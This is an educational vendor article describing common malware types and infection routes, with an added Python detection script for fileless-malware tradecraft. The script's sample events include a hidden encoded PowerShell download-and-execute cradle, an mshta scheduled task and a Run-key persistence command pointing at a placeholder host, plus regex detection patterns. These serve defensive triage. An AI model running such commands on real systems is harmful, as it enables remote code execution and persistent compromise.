What Is Malware?
Malware (short for malicious software) is any program or code built to infiltrate, damage, or extract information from computer systems. Cybercriminals use it for everything from stealing data, deleting files, and recording keystrokes to harvesting login credentials. This makes malware both a powerful tool for attackers and a threat that every organization needs to address.
Once a system is infected, the threat actor can usually control it extensively, if not fully, and can return to it whenever they choose. This is a particular concern during off-hours, when many organizations have less security-team coverage.
By some industry estimates, a malware attack occurs roughly every 11 seconds. To help protect your organization, start by learning about the various malware types.
Types of Malware
Malware comes in many forms. Below, we've compiled a list of the most common types.
A computer virus behaves like a biological one: it inserts its malicious code into a host program or file and replicates to other files and systems when that host runs. Because the virus lives inside otherwise legitimate executables, removal is difficult; cleaning or deleting every infected host can break the programs that depend on them, or even the system itself.
To stop further damage from a virus, infected files must first be quarantined; further replication can then be blocked, and the virus completely removed from the system.
Computer worms are self-replicating malicious programs that spread on their own across networks, typically by exploiting vulnerabilities or weak credentials on reachable hosts. They are especially dangerous because no end-user interaction is required to infect a network.
Ransomware is exactly what it sounds like: malware that encrypts files or locks users out of systems until a ransom is paid. Even organizations that pay may not regain access to their systems or data. Ransomware attacks are becoming more prevalent and have evolved into double-extortion schemes, in which attackers also steal sensitive data and threaten to leak it if the ransom is not met.
Keyloggers are keystroke-monitoring programs (sometimes malware, sometimes commercial software) that let an outsider record everything a user types. Some keyloggers have legitimate uses, such as employer monitoring for security purposes, but in the wrong hands they expose the enterprise to credential and data theft.
A "trojan horse" refers to the wooden horse of the Trojan War, in which Greek soldiers hid so they could be carried inside the walls of Troy and open the gates for the rest of their army.
The same concept applies in cyber attacks. A digital trojan horse is disguised as legitimate software and is distributed via email links and attachments, benign-looking applications, or a social engineering lure. Once run, it opens a backdoor that gives attackers a foothold from which to reach as much of the company's digital infrastructure as possible.
Spyware is malware that covertly monitors a victim and collects data for the attacker's benefit. It typically gathers personally identifiable information (PII), credentials, and browsing activity, which can then be monetized or used to reach additional sensitive data.
Backdoors are hidden ways to bypass normal authentication. Vendors sometimes leave them in deliberately (maintenance accounts, debug interfaces, hard-coded credentials), and attackers plant their own after a compromise. Whatever the origin, an undocumented access path that falls into the wrong hands can have severe consequences.
Fileless malware runs without writing a traditional executable to disk. Instead, it lives in memory and abuses features the operating system already provides: built-in scripting hosts such as PowerShell and WMI, registry keys, and scheduled tasks. Because the attacker's activity blends in with legitimate scripts and administrative tools, it can remain hidden for an extended period, and detection and mitigation are correspondingly harder.
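As an added example (not code from the original page), here is how a detection engineer might triage process-creation telemetry for the living-off-the-land patterns fileless malware relies on: encoded PowerShell, hidden windows, download cradles, script hosts such as mshta and wscript, Run-key and scheduled-task persistence, and Office applications spawning a shell. The event shape, indicator names, thresholds and sample events are assumptions constructed for this illustration; the encoded payload is built inline so the decoding step is visible.

```python
import base64
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1 /
# Windows 4688 summaries. None are real telemetry; 203.0.113.5 is a
# documentation address. The encoded command is built here so the reader can
# see what the base64 hides.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"id": 1, "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {SAMPLE_ENCODED}"},
    {"id": 2, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"id": 3, "parent": "cmd.exe", "image": "schtasks.exe",
     "cmdline": 'schtasks /create /tn Updater /sc minute /mo 5 '
                '/tr "mshta http://203.0.113.5/u.hta"'},
    {"id": 4, "parent": "cmd.exe", "image": "reg.exe",
     "cmdline": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run '
                r'/v upd /d "wscript //e:jscript C:\Users\Public\u.txt"'},
    {"id": 5, "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
]

# Command-line patterns that, in combination, characterise fileless tradecraft.
INDICATORS = {
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[a-z0-9+/=]{40,}", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop\b|-noprofile\b", re.I),
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|bitsadmin|certutil.*-urlcache",
        re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "lolbin_script_host": re.compile(r"\b(?:mshta|wscript|cscript|regsvr32|rundll32)\b", re.I),
    "run_key_persistence": re.compile(r"currentversion\\run\b", re.I),
    "scheduled_task_create": re.compile(r"schtasks\s+/create", re.I),
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -EncodedCommand (UTF-16LE base64), or None."""
    m = INDICATORS["encoded_command"].search(cmdline)
    if not m:
        return None
    blob = m.group(0).split()[-1]
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> list[str]:
    """List the indicators an event triggers, scanning the decoded payload too."""
    text = event["cmdline"]
    findings = []
    decoded = decode_encoded_command(text)
    if decoded is not None:
        findings.append("decoded_utf16le_base64")
        text = text + "\n" + decoded   # the cradle is only visible after decoding
    for name, rx in INDICATORS.items():
        if rx.search(text):
            findings.append(name)
    if event["parent"].lower() in OFFICE_PARENTS and event["image"].lower() in SCRIPT_HOSTS:
        findings.append("office_spawned_script_host")
    return findings


def triage(events: list[dict], threshold: int = 2) -> list[int]:
    """IDs of events with at least `threshold` indicators, worth an analyst's time."""
    return [e["id"] for e in events if len(analyze(e)) >= threshold]


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e["id"], e["image"], analyze(e))
    print("escalate:", triage(SAMPLE_EVENTS))
```

The point of the decoding step is that none of the strings a signature would look for (IEX, DownloadString, the URL) appear in the raw command line; only the decoded UTF-16LE script exposes them. The threshold is deliberately low because a single indicator (a hidden window, a scheduled task) is common in legitimate administration, while two or more together rarely are.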
Anyone browsing online has likely encountered adware, even with a pop-up blocker enabled. Adware most commonly injects unwanted advertisements or redirects web users to another site offering a similar product. Attackers also use adware to generate income through online advertising services such as Google's AdSense.
Malvertising is malicious advertising: an ad that poses as an ordinary promotion but delivers malware. It does not need to look "sketchy" and can appear on reputable sites, because attackers place it through the same ad networks that legitimate advertisers use. Clicking the ad (or, in some cases, merely loading the page that displays it) delivers malware to the user's system and can give attackers control of the device.
Rootkits are malware that obtains privileged (administrator or kernel-level) access to a system and then hides its presence from users and security tools. Because they operate at the operating-system level, rootkits are far more capable than most other malware: they can conceal processes and files, lock administrators out of their own systems, and undermine the tools that would normally detect them.
Bots and Botnets
A bot is a device infected with malware that lets an attacker control it remotely; a botnet is a large group of such devices directed from a command-and-control server. Botnets are typically assembled using trojans, worms, and viruses, and their combined capacity can overwhelm even strong defenses if an organization hasn't prepared for it. Distributed denial of service (DDoS) attacks are a common use of botnets; when executed by skilled operators, they can take a system or website down for an extended period.
Random-Access Memory (RAM) Scrapers
RAM scrapers harvest data held temporarily in random access memory (hence the name). This type of malware targets the memory of sensitive devices such as point-of-sale systems, where data like payment card numbers is briefly held in plaintext while being processed, even when it is encrypted on disk and in transit.
Mobile malware is just that: malware targeting mobile devices. "Jailbroken" or rooted phones are often more susceptible because jailbreaking removes protections the platform applies by default, such as app sandboxing and code-signing enforcement.
How Does Malware Infiltrate and Spread?
Malware can enter and spread throughout a system, network, or device in a variety of ways. The following is a list of the most common methods.
A vulnerability can be anything from an unpatched software flaw, to an employee who doesn't recognize social engineering, to physical access to an unsecured data center.
Threat actors frequently exploit vulnerabilities to gain initial access into an organization.
As mentioned earlier, backdoors are a major risk because they give an intruder quiet, persistent access that can be used extensively and for a long time. Often, security administrators don't realize an intruder got in through a backdoor until it's too late.
Enterprises should put as many barriers as possible between an attacker and their critical assets. A flat network saves the cost and effort of segmentation (extra firewalls, routers, or VLAN configuration), but it also lets malware that lands on one host reach every other host freely, and it gives the organization no way to control traffic flow or apply controls such as segmentation.
Drive-by downloads happen when a user's device is infected simply by visiting a compromised or malicious website, typically through an exploit of a browser or plugin vulnerability. Because no action beyond loading the page is required, this type of attack is especially dangerous.
Hybrid threats combine multiple styles of malware into one package so that security tools detect the decoy and miss the true threat. The technique aims to hide the malware's real intent, without the user realizing what is actually occurring.
Enabling Cybersecurity with SailPoint
With SailPoint, enterprises can feel more confident that their organization’s cybersecurity program is enabled by some of the best protocols available. Learn how we can best align with your company’s identity security, identity governance, and other cybersecurity goals.